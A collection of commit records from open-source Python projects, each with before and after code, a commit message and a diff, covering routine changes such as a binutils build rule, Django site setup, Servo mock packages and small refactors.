raise xyz.UsageError("Invalid target ({}) for {}".format(builder.target, self.pkg_name))
def configure(self, builder, config):
builder.cross_configure('--disable-nls', '--enable-lto', '--enable-ld=yes', '--without-zlib',
config=config)
def install(self, builder, config):
super().install(builder, config)
# For some reason binutils plonks libiberty.a in the output directory
libdir = builder.j('{install_dir_abs}', config['eprefix'][1:], 'lib', config=config)
if os.path.exists(libdir):
shutil.rmtree(libdir)
# For now we strip the man pages.
# man pages created on different systems are (for no good reason) different!
man_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'man', config=config)
shutil.rmtree(man_dir)
rules = Binutils()
|
import xyz
import os
import shutil
class Binutils(xyz.BuildProtocol):
pkg_name = 'binutils'
supported_targets = ['arm-none-eabi']
def check(self, builder):
if builder.target not in self.supported_targets:
raise xyz.UsageError("Invalid target ({}) for {}".format(builder.target, self.pkg_name))
def configure(self, builder, config):
builder.cross_configure('--disable-nls', '--enable-lto', '--enable-ld=yes', '--without-zlib',
config=config)
def install(self, builder, config):
super().install(builder, config)
# For some reason binutils plonks libiberty.a in the output directory
libdir = builder.j('{install_dir_abs}', config['eprefix'][1:], 'lib', config=config)
if os.path.exists(libdir):
shutil.rmtree(libdir)
# For now we strip the man pages.
# man pages created on different systems are (for no good reason) different!
man_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'man', config=config)
shutil.rmtree(man_dir)
# For now we strip the info pages too.
# Different versino of texinfo product different output!
info_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'info', config=config)
shutil.rmtree(info_dir)
rules = Binutils()
|
Remove info dirs (for now)
|
Remove info dirs (for now)
|
Python
|
mit
|
BreakawayConsulting/xyz
|
---
+++
@@ -25,5 +25,10 @@
man_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'man', config=config)
shutil.rmtree(man_dir)
+ # For now we strip the info pages too.
+ # Different versino of texinfo product different output!
+ info_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'info', config=config)
+ shutil.rmtree(info_dir)
+
rules = Binutils()
|
86f8ccedae6bf671a88aa342cf993bab55057406
|
api/models.py
|
api/models.py
|
class MessageModel:
def __init__(self, message, duration, creation_date, message_category):
# We will automatically generate the new id
self.id = 0
self.message = message
self.duration = duration
self.creation_date = creation_date
self.message_category = message_category
self.printed_times = 0
self.printed_once = False
class AccountModel:
def __init__(self, account_type, account_number, name, first_name, address, birthdate):
# We will automatically generate the new id
self.id = 0
self.type = account_type
self.number = account_number
self.name = name
self.first_name = first_name
self.address = address
self.birthdate = birthdate
#We will automatically generate next 2 parameters based on client address.
self.longitude = 0;
self.latitude = 0;
|
class AccountModel:
def __init__(self, account_type, account_number, name, first_name, address, birthdate):
# We will automatically generate the new id
self.id = 0
self.type = account_type
self.number = account_number
self.name = name
self.first_name = first_name
self.address = address
self.birthdate = birthdate
#We will automatically generate next 2 parameters based on client address.
self.longitude = 0;
self.latitude = 0;
|
Remove message model as unused
|
Remove message model as unused
No need in test class as soon as we have working api
|
Python
|
mit
|
candidate48661/BEA
|
---
+++
@@ -1,15 +1,3 @@
-class MessageModel:
- def __init__(self, message, duration, creation_date, message_category):
- # We will automatically generate the new id
- self.id = 0
- self.message = message
- self.duration = duration
- self.creation_date = creation_date
- self.message_category = message_category
- self.printed_times = 0
- self.printed_once = False
-
-
class AccountModel:
def __init__(self, account_type, account_number, name, first_name, address, birthdate):
# We will automatically generate the new id
|
5490939f5b94b15c154e027abcd295f14ac17a45
|
src/config/site_utils.py
|
src/config/site_utils.py
|
from django.contrib.sites.models import Site
def set_site_info(domain='datahub-local.mit.edu', name='MIT DataHub'):
site = Site.objects.get_current()
if site.domain != domain:
site.domain = domain
site.name = name
site.save()
|
from django.contrib.sites.models import Site
from django.db.utils import ProgrammingError
def set_site_info(domain='datahub-local.mit.edu', name='MIT DataHub'):
try:
site = Site.objects.get_current()
if site.domain != domain:
site.domain = domain
site.name = name
site.save()
except ProgrammingError:
pass
|
Make sure initial migration works for new installs.
|
Make sure initial migration works for new installs.
Bootstrapping the Site model entirely in settings isn't great.
|
Python
|
mit
|
datahuborg/datahub,datahuborg/datahub,anantb/datahub,RogerTangos/datahub-stub,anantb/datahub,RogerTangos/datahub-stub,datahuborg/datahub,anantb/datahub,RogerTangos/datahub-stub,RogerTangos/datahub-stub,RogerTangos/datahub-stub,datahuborg/datahub,datahuborg/datahub,anantb/datahub,anantb/datahub,RogerTangos/datahub-stub,datahuborg/datahub,anantb/datahub,RogerTangos/datahub-stub,datahuborg/datahub,anantb/datahub
|
---
+++
@@ -1,9 +1,13 @@
from django.contrib.sites.models import Site
+from django.db.utils import ProgrammingError
def set_site_info(domain='datahub-local.mit.edu', name='MIT DataHub'):
- site = Site.objects.get_current()
- if site.domain != domain:
- site.domain = domain
- site.name = name
- site.save()
+ try:
+ site = Site.objects.get_current()
+ if site.domain != domain:
+ site.domain = domain
+ site.name = name
+ site.save()
+ except ProgrammingError:
+ pass
|
1b3ec35857a8eff88b8984c83564e18a25ff081e
|
app/routes.py
|
app/routes.py
|
from flask import request, jsonify, session, g
import numpy as np
from DatasetCreation import ConstructDataset
from . import app
from . import firebase
from sklearn.ensemble import RandomForestClassifier
from sklearn import preprocessing
from sklearn.cross_validation import cross_val_score
@app.route("/", methods=["GET"])
def index():
response = firebase.get("/", None)
response = response or {}
datapoints, labels = ConstructDataset(response)
print len(datapoints)
print len(labels)
# print datapoints[ labels == True ]
print datapoints[10]
#enc = preprocessing.OneHotEncoder()
#print enc.fit(datapoints)
#clf = RandomForestClassifier(n_estimators=10, min_samples_split=1)
#clf = clf.fit(datapoints, labels)
#scores = cross_val_score(clf, datapoints, labels)
#scores.mean()
#clf = DecisionTreeClassifier(max_depth=None, min_samples_split=1, random_state=0)
#scores = cross_val_score(clf, datapoints, labels)
#scores.mean()
return jsonify(response)
|
from flask import jsonify
from . import app
from . import firebase
@app.route("/", methods=["GET"])
def index():
response = firebase.get("/", None)
response = response or {}
return jsonify(response)
|
Remove commented code and unused imports
|
Remove commented code and unused imports
|
Python
|
mit
|
MachineLearningProject/flight-delay-prediction,MachineLearningProject/flight-delay-prediction,MachineLearningProject/flight-delay-prediction
|
---
+++
@@ -1,13 +1,7 @@
-from flask import request, jsonify, session, g
-import numpy as np
-from DatasetCreation import ConstructDataset
+from flask import jsonify
from . import app
from . import firebase
-
-from sklearn.ensemble import RandomForestClassifier
-from sklearn import preprocessing
-from sklearn.cross_validation import cross_val_score
@app.route("/", methods=["GET"])
@@ -15,24 +9,4 @@
response = firebase.get("/", None)
response = response or {}
- datapoints, labels = ConstructDataset(response)
- print len(datapoints)
- print len(labels)
-
- # print datapoints[ labels == True ]
- print datapoints[10]
-
- #enc = preprocessing.OneHotEncoder()
- #print enc.fit(datapoints)
-
- #clf = RandomForestClassifier(n_estimators=10, min_samples_split=1)
- #clf = clf.fit(datapoints, labels)
-
- #scores = cross_val_score(clf, datapoints, labels)
- #scores.mean()
-
- #clf = DecisionTreeClassifier(max_depth=None, min_samples_split=1, random_state=0)
- #scores = cross_val_score(clf, datapoints, labels)
- #scores.mean()
-
return jsonify(response)
|
37bcc2ffcdf17108d381842ff4b2427a52bbae52
|
bld/linux.py
|
bld/linux.py
|
config = {
'mock_target': 'mozilla-centos6-x86_64',
'mock_packages': ['freetype-devel', 'fontconfig-devel', 'glib2-devel', 'autoconf213', 'git', 'make', 'libX11-devel', 'mesa-libGL-devel', 'freeglut-devel',
'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel'],
'mock_files': [('/home/servobld/.ssh', '/home/mock_mozilla/.ssh')],
'concurrency': 6,
'add_actions': ['setup-mock'],
}
|
config = {
'mock_target': 'mozilla-centos6-x86_64',
'mock_packages': ['freetype-devel', 'fontconfig-devel', 'glib2-devel', 'autoconf213', 'git', 'make', 'libX11-devel', 'mesa-libGL-devel', 'freeglut-devel',
'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel', 'gperf'],
'mock_files': [('/home/servobld/.ssh', '/home/mock_mozilla/.ssh')],
'concurrency': 6,
'add_actions': ['setup-mock'],
}
|
Install gperf on Linux builders
|
Install gperf on Linux builders
|
Python
|
mpl-2.0
|
SimonSapin/servo,huonw/servo,jdramani/servo,saratang/servo,luniv/servo,paulrouget/servo,dati91/servo,tafia/servo,cbrewster/servo,tschneidereit/servo,wartman4404/servo,kindersung/servo,mbrubeck/servo,juzer10/servo,mrobinson/servo,akosel/servo,rentongzhang/servo,peterjoel/servo,mrobinson/servo,froydnj/servo,youprofit/servo,jimberlage/servo,saneyuki/servo,AnthonyBroadCrawford/servo,Adenilson/prototype-viewing-distance,juzer10/servo,zentner-kyle/servo,indykish/servo,g-k/servo,mbrubeck/servo,dhananjay92/servo,GreenRecycleBin/servo,steveklabnik/servo,peterjoel/servo,jimberlage/servo,GreenRecycleBin/servo,juzer10/servo,tempbottle/servo,tempbottle/servo,DominoTree/servo,akosel/servo,CJ8664/servo,mrobinson/servo,peterjoel/servo,caldwell/servo,g-k/servo,emilio/servo,mukilan/servo,nrc/servo,avadacatavra/servo,splav/servo,emilio/servo,wpgallih/servo,walac/servo,Shraddha512/servo,g-k/servo,dhananjay92/servo,caldwell/servo,bfrohs/servo,shrenikgala/servo,CJ8664/servo,akosel/servo,eddyb/servo,tempbottle/servo,s142857/servo,dsandeephegde/servo,bjwbell/servo,mbrubeck/servo,boghison/servo,fiji-flo/servo,jdramani/servo,mattnenterprise/servo,seanmonstar/servo,runarberg/servo,eddyb/servo,dhananjay92/servo,mukilan/servo,samfoo/servo,tempbottle/servo,AnthonyBroadCrawford/servo,dsandeephegde/servo,thiagopnts/servo,emilio/servo,jdramani/servo,KiChjang/servo,ryancanhelpyou/servo,saratang/servo,jdramani/servo,steveklabnik/servo,larsbergstrom/servo,pgonda/servo,emilio/servo,Adenilson/prototype-viewing-distance,avadacatavra/servo,paulrouget/servo,evilpie/servo,upsuper/servo,nick-thompson/servo,saneyuki/servo,Shraddha512/servo,paulrouget/servo,zentner-kyle/servo,snf/servo,anthgur/servo,dvberkel/servo,jgraham/servo,eddyb/servo,cbrewster/servo,steveklabnik/servo,boghison/servo,canaltinova/servo,zentner-kyle/servo,dvberkel/servo,echochamber/servo,RenaudParis/servo,jdramani/servo,pyfisch/servo,rentongzhang/servo,chotchki/servo,szeged/servo,emilio/servo,vks/servo,sadmansk/servo,GreenRecycleBin/servo,kindersung/servo,wpgallih/servo,deokjinkim/servo,avadacatavra/servo,luniv/servo,mt2d2/servo,cbrewster/servo,splav/servo,cbrewster/servo,wartman4404/servo,s142857/servo,huonw/servo,A-deLuna/servo,Adenilson/prototype-viewing-distance,upsuper/servo,srbhklkrn/SERVOENGINE,juzer10/servo,meh/servo,ruud-v-a/servo,walac/servo,saneyuki/servo,chotchki/servo,rentongzhang/servo,RenaudParis/servo,notriddle/servo,codemac/servo,fiji-flo/servo,saneyuki/servo,saratang/servo,jgraham/servo,GyrosOfWar/servo,akosel/servo,meh/servo,DominoTree/servo,evilpie/servo,nerith/servo,DominoTree/servo,AnthonyBroadCrawford/servo,boghison/servo,indykish/servo,vks/servo,paulrouget/servo,jimberlage/servo,meh/servo,saneyuki/servo,karlito40/servo,rnestler/servo,jimberlage/servo,KiChjang/servo,emilio/servo,A-deLuna/servo,peterjoel/servo,codemac/servo,Adenilson/prototype-viewing-distance,tschneidereit/servo,codemac/servo,chotchki/servo,saratang/servo,meh/servo,splav/servo,indykish/servo,samfoo/servo,bjwbell/servo,anthgur/servo,nrc/servo,fiji-flo/servo,walac/servo,brendandahl/servo,walac/servo,jlegendary/servo,wartman4404/servo,dagnir/servo,jgraham/servo,notriddle/servo,aweinstock314/servo,luniv/servo,mattnenterprise/servo,steveklabnik/servo,wpgallih/servo,youprofit/servo,chotchki/servo,SimonSapin/servo,pgonda/servo,bfrohs/servo,michaelwu/servo,A-deLuna/servo,kindersung/servo,DominoTree/servo,mt2d2/servo,g-k/servo,cbrewster/servo,mrobinson/servo,dati91/servo,froydnj/servo,dati91/servo,aidanhs/servo,brendandahl/servo,A-deLuna/servo,dhananjay92/servo,thiagopnts/servo,SimonSapin/servo,GyrosOfWar/servo,KiChjang/servo,s142857/servo,tafia/servo,echochamber/servo,dsandeephegde/servo,michaelwu/servo,g-k/servo,SimonSapin/servo,bjwbell/servo,aidanhs/servo,runarberg/servo,szeged/servo,rentongzhang/servo,echochamber/servo,aidanhs/servo,mbrubeck/servo,shrenikgala/servo,michaelwu/servo,runarberg/servo,mdibaiee/servo,cbrewster/servo,GyrosOfWar/servo,youprofit/servo,samfoo/servo,mattnenterprise/servo,fiji-flo/servo,zhangjunlei26/servo,huonw/servo,WriterOfAlicrow/servo,brendandahl/servo,brendandahl/servo,KiChjang/servo,jgraham/servo,nick-thompson/servo,nerith/servo,karlito40/servo,echochamber/servo,rnestler/servo,anthgur/servo,boghison/servo,avadacatavra/servo,peterjoel/servo,mattnenterprise/servo,notriddle/servo,codemac/servo,pgonda/servo,shrenikgala/servo,aidanhs/servo,A-deLuna/servo,larsbergstrom/servo,deokjinkim/servo,notriddle/servo,dmarcos/servo,A-deLuna/servo,akosel/servo,shrenikgala/servo,luniv/servo,Adenilson/prototype-viewing-distance,paulrouget/servo,zentner-kyle/servo,rnestler/servo,ConnorGBrewster/servo,caldwell/servo,thiagopnts/servo,jlegendary/servo,mrobinson/servo,dhananjay92/servo,canaltinova/servo,upsuper/servo,WriterOfAlicrow/servo,vks/servo,pyfisch/servo,mbrubeck/servo,hyowon/servo,vks/servo,ruud-v-a/servo,shrenikgala/servo,shrenikgala/servo,mattnenterprise/servo,srbhklkrn/SERVOENGINE,bjwbell/servo,snf/servo,zhangjunlei26/servo,dvberkel/servo,CJ8664/servo,sadmansk/servo,brendandahl/servo,avadacatavra/servo,ryancanhelpyou/servo,dati91/servo,tempbottle/servo,evilpie/servo,thiagopnts/servo,codemac/servo,nick-thompson/servo,splav/servo,eddyb/servo,saneyuki/servo,bfrohs/servo,indykish/servo,steveklabnik/servo,samfoo/servo,sadmansk/servo,sadmansk/servo,KiChjang/servo,tempbottle/servo,ConnorGBrewster/servo,caldwell/servo,WriterOfAlicrow/servo,ConnorGBrewster/servo,jgraham/servo,fiji-flo/servo,AnthonyBroadCrawford/servo,s142857/servo,ryancanhelpyou/servo,nerith/servo,sadmansk/servo,Shraddha512/servo,g-k/servo,rixrix/servo,kindersung/servo,nnethercote/servo,kindersung/servo,dagnir/servo,karlito40/servo,CJ8664/servo,thiagopnts/servo,aweinstock314/servo,nnethercote/servo,emilio/servo,nnethercote/servo,karlito40/servo,karlito40/servo,indykish/servo,kindersung/servo,mbrubeck/servo,larsbergstrom/servo,ConnorGBrewster/servo,dagnir/servo,peterjoel/servo,CJ8664/servo,zhangjunlei26/servo,nrc/servo,aidanhs/servo,pyecs/servo,eddyb/servo,srbhklkrn/SERVOENGINE,thiagopnts/servo,saratang/servo,paulrouget/servo,echochamber/servo,chotchki/servo,karlito40/servo,jimberlage/servo,seanmonstar/servo,rixrix/servo,Shraddha512/servo,chotchki/servo,runarberg/servo,mukilan/servo,zhangjunlei26/servo,larsbergstrom/servo,saneyuki/servo,ryancanhelpyou/servo,tafia/servo,hyowon/servo,seanmonstar/servo,DominoTree/servo,saneyuki/servo,boghison/servo,aweinstock314/servo,dmarcos/servo,indykish/servo,jgraham/servo,ryancanhelpyou/servo,larsbergstrom/servo,aidanhs/servo,tschneidereit/servo,j3parker/servo,srbhklkrn/SERVOENGINE,fiji-flo/servo,emilio/servo,pyfisch/servo,samfoo/servo,mattnenterprise/servo,hyowon/servo,mukilan/servo,rixrix/servo,nnethercote/servo,larsbergstrom/servo,paulrouget/servo,RenaudParis/servo,pyfisch/servo,GreenRecycleBin/servo,luniv/servo,froydnj/servo,zhangjunlei26/servo,dmarcos/servo,szeged/servo,wartman4404/servo,tafia/servo,tschneidereit/servo,canaltinova/servo,saratang/servo,samfoo/servo,wartman4404/servo,notriddle/servo,evilpie/servo,AnthonyBroadCrawford/servo,canaltinova/servo,deokjinkim/servo,zhangjunlei26/servo,KiChjang/servo,rentongzhang/servo,KiChjang/servo,zentner-kyle/servo,saneyuki/servo,WriterOfAlicrow/servo,notriddle/servo,upsuper/servo,GreenRecycleBin/servo,mdibaiee/servo,WriterOfAlicrow/servo,pyecs/servo,sadmansk/servo,indykish/servo,CJ8664/servo,mattnenterprise/servo,j3parker/servo,seanmonstar/servo,tschneidereit/servo,cbrewster/servo,akosel/servo,GyrosOfWar/servo,jdramani/servo,nrc/servo,dsandeephegde/servo,youprofit/servo,dagnir/servo,emilio/servo,paulrouget/servo,nick-thompson/servo,emilio/servo,froydnj/servo,mt2d2/servo,steveklabnik/servo,nerith/servo,wpgallih/servo,tafia/servo,froydnj/servo,KiChjang/servo,evilpie/servo,bjwbell/servo,caldwell/servo,szeged/servo,splav/servo,walac/servo,mbrubeck/servo,cbrewster/servo,dhananjay92/servo,pyecs/servo,nnethercote/servo,dsandeephegde/servo,caldwell/servo,ruud-v-a/servo,wartman4404/servo,szeged/servo,zentner-kyle/servo,ConnorGBrewster/servo,nerith/servo,pyfisch/servo,rixrix/servo,jimberlage/servo,evilpie/servo,bjwbell/servo,szeged/servo,pgonda/servo,thiagopnts/servo,vks/servo,youprofit/servo,nick-thompson/servo,j3parker/servo,mt2d2/servo,pgonda/servo,samfoo/servo,s142857/servo,jlegendary/servo,eddyb/servo,dvberkel/servo,mdibaiee/servo,jgraham/servo,larsbergstrom/servo,paulrouget/servo,CJ8664/servo,GreenRecycleBin/servo,huonw/servo,GreenRecycleBin/servo,dagnir/servo,nick-thompson/servo,nnethercote/servo,fiji-flo/servo,michaelwu/servo,walac/servo,vks/servo,caldwell/servo,thiagopnts/servo,kindersung/servo,GyrosOfWar/servo,evilpie/servo,splav/servo,rnestler/servo,GreenRecycleBin/servo,pyfisch/servo,ConnorGBrewster/servo,KiChjang/servo,canaltinova/servo,canaltinova/servo,dmarcos/servo,j3parker/servo,wpgallih/servo,mukilan/servo,peterjoel/servo,avadacatavra/servo,jlegendary/servo,Shraddha512/servo,j3parker/servo,boghison/servo,DominoTree/servo,mdibaiee/servo,peterjoel/servo,mt2d2/servo,RenaudParis/servo,boghison/servo,Adenilson/prototype-viewing-distance,hyowon/servo,mdibaiee/servo,jimberlage/servo,deokjinkim/servo,canaltinova/servo,brendandahl/servo,wpgallih/servo,akosel/servo,tschneidereit/servo,mattnenterprise/servo,hyowon/servo,juzer10/servo,bfrohs/servo,rnestler/servo,dati91/servo,RenaudParis/servo,szeged/servo,nnethercote/servo,runarberg/servo,bfrohs/servo,hyowon/servo,aweinstock314/servo,luniv/servo,anthgur/servo,huonw/servo,nrc/servo,deokjinkim/servo,dati91/servo,rixrix/servo,pyecs/servo,CJ8664/servo,dsandeephegde/servo,mt2d2/servo,WriterOfAlicrow/servo,anthgur/servo,notriddle/servo,A-deLuna/servo,dagnir/servo,dmarcos/servo,RenaudParis/servo,seanmonstar/servo,AnthonyBroadCrawford/servo,mdibaiee/servo,youprofit/servo,echochamber/servo,notriddle/servo,tafia/servo,dati91/servo,jimberlage/servo,wpgallih/servo,sadmansk/servo,brendandahl/servo,WriterOfAlicrow/servo,runarberg/servo,ConnorGBrewster/servo,huonw/servo,larsbergstrom/servo,ruud-v-a/servo,zhangjunlei26/servo,splav/servo,jimberlage/servo,evilpie/servo,ryancanhelpyou/servo,srbhklkrn/SERVOENGINE,notriddle/servo,deokjinkim/servo,ConnorGBrewster/servo,Shraddha512/servo,upsuper/servo,j3parker/servo,pyecs/servo,deokjinkim/servo,snf/servo,rixrix/servo,nerith/servo,ryancanhelpyou/servo,froydnj/servo,anthgur/servo,nnethercote/servo,evilpie/servo,shrenikgala/servo,zhangjunlei26/servo,AnthonyBroadCrawford/servo,nnethercote/servo,dsandeephegde/servo,s142857/servo,rnestler/servo,huonw/servo,wpgallih/servo,Shraddha512/servo,snf/servo,dvberkel/servo,pyfisch/servo,anthgur/servo,s142857/servo,SimonSapin/servo,jlegendary/servo,steveklabnik/servo,rixrix/servo,RenaudParis/servo,rixrix/servo,tschneidereit/servo,nerith/servo,nrc/servo,upsuper/servo,nnethercote/servo,dagnir/servo,hyowon/servo,dhananjay92/servo,indykish/servo,upsuper/servo,szeged/servo,canaltinova/servo,snf/servo,codemac/servo,echochamber/servo,indykish/servo,j3parker/servo,mrobinson/servo,tempbottle/servo,upsuper/servo,GreenRecycleBin/servo,eddyb/servo,mukilan/servo,dvberkel/servo,pyecs/servo,jlegendary/servo,zhangjunlei26/servo,nick-thompson/servo,GyrosOfWar/servo,paulrouget/servo,peterjoel/servo,g-k/servo,ruud-v-a/servo,karlito40/servo,juzer10/servo,rixrix/servo,rentongzhang/servo,wartman4404/servo,mt2d2/servo,GyrosOfWar/servo,dmarcos/servo,saratang/servo,pgonda/servo,srbhklkrn/SERVOENGINE,seanmonstar/servo,saneyuki/servo,rnestler/servo,dvberkel/servo,DominoTree/servo,eddyb/servo,meh/servo,srbhklkrn/SERVOENGINE,larsbergstrom/servo,SimonSapin/servo,snf/servo,fiji-flo/servo,ruud-v-a/servo,sadmansk/servo,splav/servo,snf/servo,youprofit/servo,aweinstock314/servo,larsbergstrom/servo,szeged/servo,notriddle/servo,splav/servo,walac/servo,aidanhs/servo,dmarcos/servo,avadacatavra/servo,dsandeephegde/servo,vks/servo,bfrohs/servo,peterjoel/servo,pyecs/servo,nrc/servo,codemac/servo,pyfisch/servo,rentongzhang/servo,pyfisch/servo,dati91/servo,rnestler/servo,anthgur/servo,mdibaiee/servo,pyfisch/servo,meh/servo,SimonSapin/servo,splav/servo,SimonSapin/servo,bjwbell/servo,michaelwu/servo,aweinstock314/servo,avadacatavra/servo,michaelwu/servo,Adenilson/prototype-viewing-distance,juzer10/servo,runarberg/servo,DominoTree/servo,jlegendary/servo,jdramani/servo,luniv/servo,DominoTree/servo,pgonda/servo,aweinstock314/servo,zentner-kyle/servo,tafia/servo,meh/servo,KiChjang/servo,szeged/servo,wpgallih/servo,mbrubeck/servo,DominoTree/servo
|
---
+++
@@ -1,7 +1,7 @@
config = {
'mock_target': 'mozilla-centos6-x86_64',
'mock_packages': ['freetype-devel', 'fontconfig-devel', 'glib2-devel', 'autoconf213', 'git', 'make', 'libX11-devel', 'mesa-libGL-devel', 'freeglut-devel',
- 'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel'],
+ 'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel', 'gperf'],
'mock_files': [('/home/servobld/.ssh', '/home/mock_mozilla/.ssh')],
'concurrency': 6,
'add_actions': ['setup-mock'],
|
3e105facfb6983a10727ae40e6c239d825460b13
|
demo/IDL/config.py
|
demo/IDL/config.py
|
# Config file for IDL demos
# The IDLs all have comments in //. style
from Synopsis.Config import Base
class Config (Base):
class Parser:
class IDL (Base.Parser.IDL):
include_path = ['.']
modules = {
'IDL':IDL,
}
class Linker:
class Linker (Base.Linker.Linker):
comment_processors = ['ssd']
modules = {
'Linker':Linker,
}
class Formatter:
class HTML (Base.Formatter.HTML):
stylesheet_file = '../html.css'
def __init__(self, argv):
"force style to be synopsis"
argv['style'] = 'synopsis'
Base.Formatter.HTML.__init__(self, argv)
modules = Base.Formatter.modules
modules['HTML'] = HTML
|
# Config file for IDL demos
# The IDLs all have comments in //. style
from Synopsis.Config import Base
class Config (Base):
class Parser:
class IDL (Base.Parser.IDL):
include_path = ['.']
modules = {
'IDL':IDL,
}
class Linker:
class Linker (Base.Linker.Linker):
comment_processors = ['ssd']
modules = {
'Linker':Linker,
}
class Formatter:
class HTML (Base.Formatter.HTML):
stylesheet_file = '../html.css'
modules = Base.Formatter.modules
modules['HTML'] = HTML
|
Remove __init__ since dont need to force style anymore
|
Remove __init__ since dont need to force style anymore
|
Python
|
lgpl-2.1
|
stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis
|
---
+++
@@ -21,10 +21,6 @@
class Formatter:
class HTML (Base.Formatter.HTML):
stylesheet_file = '../html.css'
- def __init__(self, argv):
- "force style to be synopsis"
- argv['style'] = 'synopsis'
- Base.Formatter.HTML.__init__(self, argv)
modules = Base.Formatter.modules
modules['HTML'] = HTML
|
8c704a01aa935f8fea1cb88683853dffa0ee5464
|
src/estimate_probs.py
|
src/estimate_probs.py
|
# from the __future__ package, import division
# to allow float division
from __future__ import division
def estimate_probs(trigram_counts_dict):
'''
# Estimates probabilities of trigrams using
# trigram_counts_dict and returns a new dictionary
# with the probabilities.
'''
trigram_probs_dict = dict.fromkeys(trigram_counts_dict)
sum_counts = sum(trigram_counts_dict.values())
probs = []
for i in trigram_counts_dict.values():
i = i / sum_counts
probs.append(i)
i = 0
for key in trigram_probs_dict:
trigram_probs_dict[key] = probs[i]
i += 1
return trigram_probs_dict
#--------------------------------------------------------#
'''
# This is a test string
'''
if __name__ == '__main__':
s = {
' a ': 1, 's i': 1, 'his': 1, 'str': 1, 's a': 1,
' is': 1, 'ing': 1, ' st': 1, 'rin': 1, 'tri': 1, 'thi': 1,
'a s': 1, 'is ': 2
}
print estimate_probs(s)
|
#! /usr/bin/python2
# from the __future__ package, import division
# to allow float division
from __future__ import division
def estimate_probs(trigram_counts_dict):
'''
# Estimates probabilities of trigrams using
# trigram_counts_dict and returns a new dictionary
# with the probabilities.
'''
trigram_probs_dict = dict.fromkeys(trigram_counts_dict)
sum_counts = sum(trigram_counts_dict.values())
probs = []
for i in trigram_counts_dict.values():
i = i / sum_counts
probs.append(i)
i = 0
for key in trigram_probs_dict:
trigram_probs_dict[key] = probs[i]
i += 1
return trigram_probs_dict
#--------------------------------------------------------#
'''
# This is a test string
'''
if __name__ == '__main__':
s = {
' a ': 1, 's i': 1, 'his': 1, 'str': 1, 's a': 1,
' is': 1, 'ing': 1, ' st': 1, 'rin': 1, 'tri': 1, 'thi': 1,
'a s': 1, 'is ': 2
}
print estimate_probs(s)
|
Make sure we use python2
|
Make sure we use python2
|
Python
|
unlicense
|
jvasilakes/language_detector,jvasilakes/language_detector
|
---
+++
@@ -1,3 +1,5 @@
+#! /usr/bin/python2
+
# from the __future__ package, import division
# to allow float division
|
af14c06b0a8443f28d92c6eee884d125b2504b00
|
examples/loader_spin.py
|
examples/loader_spin.py
|
# -*- coding: utf-8 -*-
"""Example for spinner that looks like loader
"""
from __future__ import unicode_literals, absolute_import, print_function
import os
import time
import random
os.sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from halo import Halo
spinner = Halo(text='Downloading dataset.zip', spinner='dots')
try:
spinner.start()
for i in xrange(100):
spinner.text = '{0}% Downloaded dataset.zip'.format(i)
time.sleep(random.random())
spinner.succeed('Downloaded dataset.zip')
except (KeyboardInterrupt, SystemExit):
spinner.stop()
|
# -*- coding: utf-8 -*-
"""Example for spinner that looks like loader
"""
from __future__ import unicode_literals, absolute_import, print_function
import os
import time
import random
os.sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from halo import Halo
spinner = Halo(text='Downloading dataset.zip', spinner='dots')
try:
spinner.start()
for i in range(100):
spinner.text = '{0}% Downloaded dataset.zip'.format(i)
time.sleep(random.random())
spinner.succeed('Downloaded dataset.zip')
except (KeyboardInterrupt, SystemExit):
spinner.stop()
|
Fix xrange to range for supporting python3
|
Fix xrange to range for supporting python3
|
Python
|
mit
|
manrajgrover/halo,ManrajGrover/halo
|
---
+++
@@ -14,7 +14,7 @@
try:
spinner.start()
- for i in xrange(100):
+ for i in range(100):
spinner.text = '{0}% Downloaded dataset.zip'.format(i)
time.sleep(random.random())
spinner.succeed('Downloaded dataset.zip')
|
7fc4a8d2a12100bae9b2ddb5c0b08fbfd94091f2
|
dataproperty/_container.py
|
dataproperty/_container.py
|
# encoding: utf-8
'''
@author: Tsuyoshi Hombashi
'''
class MinMaxContainer(object):
@property
def min_value(self):
return self.__min_value
@property
def max_value(self):
return self.__max_value
def __init__(self, value_list=[]):
self.__min_value = None
self.__max_value = None
for value in value_list:
self.update(value)
def diff(self):
try:
return self.max_value - self.min_value
except TypeError:
return float("nan")
def mean(self):
try:
return (self.max_value + self.min_value) * 0.5
except TypeError:
return float("nan")
def update(self, value):
if value is None:
return
if self.__min_value is None:
self.__min_value = value
else:
self.__min_value = min(self.__min_value, value)
if self.__max_value is None:
self.__max_value = value
else:
self.__max_value = max(self.__max_value, value)
|
# encoding: utf-8
'''
@author: Tsuyoshi Hombashi
'''
class MinMaxContainer(object):
@property
def min_value(self):
return self.__min_value
@property
def max_value(self):
return self.__max_value
def __init__(self, value_list=[]):
self.__min_value = None
self.__max_value = None
for value in value_list:
self.update(value)
def __eq__(self, other):
return all([
self.min_value == other.min_value,
self.max_value == other.max_value,
])
def __ne__(self, other):
return any([
self.min_value != other.min_value,
self.max_value != other.max_value,
])
def __contains__(self, x):
return self.min_value <= x <= self.max_value
def diff(self):
try:
return self.max_value - self.min_value
except TypeError:
return float("nan")
def mean(self):
try:
return (self.max_value + self.min_value) * 0.5
except TypeError:
return float("nan")
def update(self, value):
if value is None:
return
if self.__min_value is None:
self.__min_value = value
else:
self.__min_value = min(self.__min_value, value)
if self.__max_value is None:
self.__max_value = value
else:
self.__max_value = max(self.__max_value, value)
|
Add __eq__, __ne__, __contains__ methods
|
Add __eq__, __ne__, __contains__ methods
|
Python
|
mit
|
thombashi/DataProperty
|
---
+++
@@ -21,6 +21,21 @@
for value in value_list:
self.update(value)
+
+ def __eq__(self, other):
+ return all([
+ self.min_value == other.min_value,
+ self.max_value == other.max_value,
+ ])
+
+ def __ne__(self, other):
+ return any([
+ self.min_value != other.min_value,
